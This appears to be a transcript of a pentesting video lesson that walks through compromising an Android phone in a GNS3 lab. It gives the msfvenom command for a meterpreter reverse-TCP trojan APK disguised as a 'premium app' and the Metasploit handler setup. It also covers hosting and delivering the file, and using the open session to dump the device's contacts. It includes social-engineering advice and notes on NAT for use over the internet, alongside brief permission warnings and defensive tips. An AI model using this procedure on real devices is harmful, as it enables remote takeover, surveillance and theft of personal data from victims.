A lovely morning to all cybersecurity engineers and professionals. Welcome back to Sonnet Institute of Technology. My name is Bruce Malauds, and it's a great pleasure to be your instructor for the Pentesting video course. This is module 3.1 of the video course. In this video, I will demonstrate on how to exploit and compromise an Android device. May I warn you that attacking networks or devices without permission is a criminal offense. That is why I am using a lab environment for the teaching purposes. Okay, as we all know that Android was derived from Linux, and Android is an open source, therefore making Android to be flexible. Most people love Android because it's flexible, they can do what they want to do. And because of that, Android now is exposed to most of the vulnerabilities. Of all the mobile malware, Android is the highest number of malware or vulnerabilities. And rooting your Android gives you a lot of benefits and gives you full control to your device. But you need to understand that you are actually poking a big hole that leads to security risk. So in this demonstration, I'll try to exploit an Android mobile remotely, and I'll be using the WAN, that is internet. So in this lab environment, let's assume that all IPs are routable, and I've already set the lab. It's inside GNS3, and I've tested all IPs, they are routable, and the lab itself consists of multiple networks and trying by all means to simulate the internet. So there are multiple hops and multiple networks, and all the nodes are connected, and they find to be to have full connectivity. So I've tested they can ping each other. So this is what we'll do. You and me as an attacker will create a trojan application file. APK is the executable file for Android, so we'll create that executable file, and which will like the victim to download and install into their mobile phone. The malicious APK can be hosted on a remote server. In this scenario, we have a remote server sitting out there. It belongs to us, so we have full control of the remote server. So we'll upload the malware into that server. So once you upload the malware to the server, then you as the attacker, you can send the links to the victim so that they can download it. So you can do that via email, social media, you can do it via social engineering as well, or you can simply have direct contact to the mobile phone and then insert your memory card and copy that malware into their phones and execute it. It's up to you how you're gonna send that trojan application to the victim. So the application itself, or the APK file, it must look good, and meaning that you have to trick the user to execute it. So it can be something like a premium application, then you offer it for free. It can be like a cracked app, something like that, and then users become curious to install that app. So you gotta be creative. So once the app is installed in the victim's mobile phone, the malware itself will call back home to the command and control server, and it's the curly box in this case. So once the malware talks to the curly box, then you can control the remote device. So once we have full connectivity into the remote device, we can install more further malware, we can install backdoors, we can even extract data such as contacts, pictures, videos, documents. We can even use the onboard camera to take pictures. We can send SMSs, download SMSs, you can initiate calls, you name, the list is endless. So what can a victim do to prevent this type of exploit or attack? These are the things that you can do to keep yourself safe. You please stay away from rooting your Android device. It is a security risk. So keep your Android device as they are. Do not root your Android device. Second thing, always install your antivirus, and LHOST is out there. It's a good antivirus. Above all, it's also free. And do not enable this feature. This feature is under settings in your Android phone, under settings, security settings. This feature is to bypass if you want to install third-party applications. So please do not enable that feature. And always use Google Play Store to download your apps. Downloading apps from third party, it is a security risk. So please stay away from third-party downloads. And if you're not sure whether your APK file is malicious or clean, you can simply download to online malware scanners such as VirusTotal. It's a good site. I've used it before. So upload your APK to them. They'll scan it and you get your results within a minute. The results will contain all the details, whether it's malicious. If it is malicious, they'll break down the information for you. If it is clean, they'll tell you it's clean. So this is what we'll do. These are the steps which we'll take in this demonstration. I'll be using Kali Linux. You can use Backtrack, you can use Backbox, or any other pen testing Linux tools. There are dozens out there. So I need to remind you that this is for educational purposes. Please avoid criminal offenses by asking permission if you want to do this on a live network, or else do it on your own network. In my case, I'm using a virtual environment. So these are the commands which you execute. Okay, the first command is msfvenom and -p for payload. And then this is the payload we like to use. We like to initiate a reverse TCP connection. And here on the LHOST, that is the local host, this is the IP of the Kali box, the attacking machine. -o is the output, and I like to output the malware into the root directory, and I'll name the malware as premium-app.apk. Once I'm done with that, I can start MSF console, and then I can select these options. I want to use the multi-angler, and then specify the payload as well, which is set. Specify the Kali Linux IP. And if you're doing this on a live environment, let's say on the internet, do not use the external IP of your router. Always use the internal IP. Then you go to your router and then enable net. So which means you need to tweak your router. All the connections that are inbound from the internet to your router, which are coming from a victim, they must be netted straight to your Kali box. Okay. Once you've done that, you set your options, then you can start exploit. So the victim, once the victim installs the malware and the victim has internet connectivity, the malware will then talk to the Kali box back to, and the meterpreter begins. Once you have a meterpreter, it means you have full access to the remote mobile and you can do anything you need to do. So without wasting time, let's get to the topology right here. This is GNS3. So I've got this might look a bit complex to other people, but I'm trying by all means to mix and match, make some different networks so that we can have some routes here, and then we can do some netting as well. So in this case, for example, I have this web server here, HTTP, my web server, and then I've got the attacker here. I've got the Cisco routers here, and if I do show IP route, all the routers have full connectivity and full route. So this is my entire routing table, and the list goes on and on. So you can see that I have full connectivity. So I can exit that. So these are the Cisco routers, as I said, different networks. This network here where the web server is residing is 192.168.15.0 on a /24. The default gateway is .1 right there. Then I've got another network here, the .20. I've got a network here, the .10, the .30, .40. And these are point-to-point links, so I'm using the /30, /30, /30. Then the Android mobile here is residing on the .40 network, and it's using /40. So its default gateway is .1, and the Android mobile is using an IP of .11. So on the other side of the world, we got the attacker using a curly box. It's residing on the 172 network, and we also have a Windows machine on the other side of the world as well. This Windows machine has nothing to do with the exploit which we need to do here, but I just put it here just for sanity check. So let me log on to this Windows machine and test full connectivity to the internet. So I want to make sure that this web server is accessible anyway, so that will be like on the public internet. So let's go to the Windows machine and let's log in. I'll log in as administrator. Okay, I can cancel that. So let me start the terminal PowerShell. So IP config. So this Windows machine has got an IP of 50.50.50.2 and its default gateway. So let me try to ping the default gateway before I go to the internet. So the default gateway should respond, as you can see. Now try to ping the web server here, that is 192.168. so my ping should go either this way or that way, whichever way, but it should be able to ping this web server. So let's get back. So let me clear the screen. Therefore I'll ping the web server, which is 192.168.15.250. so the web server is responding, so I have full connectivity. And let's check if I can get the web server through the browser. Okay, so let's reach HTTP. The web server is 192.168.250. Okay, so the web server is fine. Everything looks good, so which means I have full connectivity. So I can exit from here, and I don't need this Windows machine for now. Do I? Yes, I'll need it. So okay, it's fine. So let's get to the attacking machine, the curly box, and start the configurations. So we need to start attacking. So I'll log in as root. Okay, let me start the terminal shell, and let me make that bigger. Okay, so I need to check my IP address. So that will be IP address show device 80 and I can pipe that. I think I've got multiple links, so I'd like to grab. Okay, so my IP is 172.16.1.2 and my default gateway, so that will be IP route show. So I've got a default gateway of .1. So can I ping my default gateway? That will be ping and send 4 packets. That will be 172.16.1.1. Oh, made a typo there. Okay, so I've got a ping. And can I ping the remote web server? So let's try. That will be ping, send 4 packets and the IP address of the remote server. So I've got full access and I can confirm as well using the web browser. So here we go. I've got full access. Here's the remote IP. Okay, so I can close that. So what I need to do now is to create, first of all I need to create the trojan malware. So the command is msfvenom and -p for payload, and I like to use the Android. That will be Android meterpreter. Made a typo. Android meterpreter. Okay, and I need a reverse TCP connection. So at this point of time I need to set the local host, that is the attacking machine, and the local host is residing on this IP. -O for the output, and I like my output to be in the root directory, and I'll name my malware as premium-app.apk. Okay, so whilst it's you might get an error message, but you can just ignore that. So whilst it's executing, I can start another terminal whilst it's creating the malware, and it has done. So let me close this one. So it has done, and you can see I've got the malware here, and then if I do ls, we can see here it is. So the next thing is to start the MSF console. Most people have had issues with the database not connecting, or Kali not connecting to the database of PostgreSQL. So we need to refresh the database. So that's the trick. I've actually realized that it's useful. So the command is msfdb init. So this will refresh the database. Okay, then the right way to start MSF is to use the full path. So that's user bin msf console and space start. So this is the right way of starting it in Kali Linux version 2. So it might take a while to load depending on your system specifics. So I'm connected. So let me clear the screen. So let's check if you are connected to the database. The command is db_status. Okay, so we are connected, so we are good to go. If you are not connected to the database, please do not proceed because it's pointless. You won't be successful. Okay, so let's proceed. From this point, I need to set my options. So the exploit which I need to use is the multi-angler. So I'll say use exploit and multi-angler. Then I'd like to set my payload. So that would be set payload. And I like to use the Android. So that will be Android meterpreter. Okay, I like to use the reverse TCP. Okay, so now I need to set my local host. That will be the IP address of this curly box. So the curly box has got an IP of 172.16.1.2. Okay, so at this point of time, I think I'm good to go, but I can do show options. Okay, these are my options. So I'll be using the default port of quad 4. So let me clear the screen. So I can do the exploit. So the exploit will actually wait before I do the exploit. So let me find a way to upload the malware to the server, to the remote server. So let me start a terminal. So okay, so my present working directory, it's root. So I need to upload this file to the web server. So how can I do that? I will SSH to the web server and find a perfect place to stash my my malware inside. So that will be SSH root and the IP address of the web server. So the IP is sitting right there. So I can say yes, enter the root password. Okay, so I'm located to the remote server, so I can navigate to the Apache directory. So that will be var www.html. So let me do an ls, so I can stash my malware right here. So let me create a directory which I will call it. So that will be make day. I'll call my directory as Android. Okay, so I should be able to stash my malware right there. So that will be cd Android. Okay, so once I'm there on the remote server, now I can secure copy. So that will be secure copy root add. So in this case, I SSH into this server, so I'm residing into the server. So now I need to secure copy. So I'm copying that malware from the curly box into the web server. So that's what I'm doing right now. So that is secure copy root add the IP address of the curly box, and where is the file which I need to copy? It's under root, and the name of the file is premium-app.apk, and I like to copy the file right here. Okay, my Kali machine is not okay, so that's fine. The Kali box is not running SSH services. So what I need to do, I can get out of here, but at least I know where I need to stash my malware. So I can exit from here and then I'll upload from the Kali box. I can use secure FTP like this, and the login is root. I'm going to the web server, the IP address of the web server, and enter my password. Okay, so I'm logged in. So if I do ls, it's showing me the list of remote files. So I need to change my directory to the Apache. That will be var www HTML, and I need to go into the Android. So if I do ls, there's nothing, but if I do ls, I need this file here to upload this file. So my command will be put the premium file. Okay, so the file has been transferred, as you can see here. So if I do ls, so I have the file right there. So I can exit from here. So my malware, my trap is set. So let's see how it looks like on the other side of the world. So let me minimize that. On a Windows machine, let me log on. So this is how it looks like on the other side of the world. Come, Mr. Windows, Mr. Windows. Damn it. There we go. Okay, so I'll start the Explorer. So if I go to HTTP and then the IP address of the server, since I do not have DNS services connected here, so I'm using the IP addresses instead of host names. So that will be the IP address and the folder which I'm trying to get to. So that is the premium-app.apk. So I'm trying to download that file on the Windows side machine. So I'd like to see if it's possible before I move on. Okay, so as you can see, I've got a security warning here. Attempting to download a file from this site that is not part of the trusted. So it means it's working. So let's see if I can download. Let's say Android. Okay, so I think I should have downloaded it. Let me try again. That's HTTP. Okay, let's try again right here. Okay, as you can see, do you want to open or save the file? So I can save, open folder. So there's my malware, as you can see. So this malware won't work on Windows, but I'll just demonstration that I uploaded the file into the remote server and I can download on the other side of the world. So I can exit from here and close that. So the malware is sitting there. So let's visit the Android phone, the Android mobile. So on the Android mobile, since I do not have DNS settings or DNS resolution, Android web browser cannot work without DNS. So I'll use the command line to download that file. So what I'll do, ls and see, I'm trying to get to the SD card and download the file right there. So that will be cd SD card and do ls. Let's go to the download. So basically when you download files, you are actually using the wget command behind the scenes. So instead of using the browser, we will use the wget command. So that will be wget http, the IP address of the web server. So that will be 192.168.15.250. Okay, and the complete URL, so that will be premium-app.apk. Okay, I think I got it right. Okay, yeah, we got it. So ls, so there's my apk file, as you can see here. So I can get out of here. Okay, so assuming that the user has used your web browser, so now we need to install that malware. So we go into file manager and find it under downloads. Okay, let me do this and get to the parent. Okay, so if you go, let me start afresh. So if you go under your applications and then choose file manager and then scroll down to storage, not there, my mistake, scroll down to downloads. There we go. Here is our malware. Can you see it? So if I click there, it will ask me if I need to install, but the security settings are blocking me. So if I need to override these settings, I need to click settings and scroll down. You see here, right here. So if I need to override, I'll just have to click that and then say okay, and then click back. Try to install the malware again. So I'll click that. Okay, so here it is. This malware, as you can see, can read your text messages, can do this and that, this and that. Anyway, so you say next and install. Okay, you can say accept or decline, doesn't matter. Okay, so I can click open. Okay, so now that it's running, I can close this window. So the malware is running in the background of this Android. So let's minimize that. Let's get back to the curly box, the attacking machine. So on the curly box, okay, on the curly box I need to go back to, let me close this window here. Go back to the metasploit. So now I need to run the command exploit. Okay, I think I made a mistake there. So let me check my options. Show options. Okay, I made a typo somewhere, so I need to rectify that. And where is my local host? Oh, there. I don't have a local host, so I don't know how I missed that. So let's do set local host, and my local host will be 172.16.1.2. Alright, so let's do show options again to make sure that we got it right. Okay, now I have my local host, which is this machine's IP. So I can exploit. So that will be exploit. Okay, as you can see, meterpreter is started and one session is opened. So if I do sysinfo, which is system information, you can see that I'm connected to an Android remotely, and here's the information of the Android. And if I do ls, actually if I do question mark to see which commands I can use, so this is the list of all the commands I can use. So I can dump all the SMSs, I can get the contact list, I can send an SMS, and coming up here I can do recording, I can initiate the webcam, I can execute remote commands, I can drop into the shell if I want to, and I can also list the running processes on the remote Android. and if I want to see the IP or the route information of the remote Android, I can do it here. And coming up here, I can list the files on the remote system and see what's inside. So let's try to execute some of these commands on it, but there are 1 or 2 contacts, and I did make 1 or 2 calls as well, which are located in the call records. So let's try to see what we have. So the first thing, we can see this command here that says check root. We can see that the Android device is rooted, so it's an extra bonus to us as an attacker. So let me try to dump the call log. So I need to get the call records. Okay, the operation has failed. Let's try to dump contacts. Okay, so I've got 2 contacts, as you can see here, and then they are saved right here. So see, but since I'm using a virtualized environment, this Android doesn't have all these features here because it's virtual. So I cannot use the camera, I cannot use the microphone, and as well I cannot get the geolocation, and I cannot send an SMS because I'm using Ethernet to virtualize the Android. So as long as you get the meterpreter, it means you can do anything you want to do. So you, at this point of time, the Android phone is fully compromised, and we are taking full control. So we are sitting right there, the Android is right there remotely, so we are controlling that Android there. So before I go, let me exit from the Metasploit. So that will be exit, and exit again. Okay, clear the screen. So here are our files which we just stole from the remote Android mobile. So let's see what we have. So that will be cat contacts.dump. So you can see that it records the version of the Android, its IP address, and what port was used, and here's the address book. So the first user, so I just made bogus contacts here. So the first user I named as Quad A, and then this is their phone number and yeah, stuff like that. The second user I made a bogus name of BBBBB, and their contact number is a series of 9, and that to fill in the gaps. So basically this is how it looks like, and we just successfully extracted data from the remote Android under their nose, and this is how you exploit Android devices undetected, if you want to call that. This is how you hack into an Android device. So this is meant for educational purpose, and it's good for pen testers to know how this is done so that they can understand the security techniques behind it. As a good pen tester, you must be a good hacker as well. So in the next video, I'll show you more on how to do post exploitation on the Android devices, meaning that after you gain access, what do you do and what can you do to that Android device. Basically here I was showing you how you can gain entrance into the Android device. So I'll see you in the next video, and I hope this has been informative. I'd like to thank you for watching. Goodbye for now.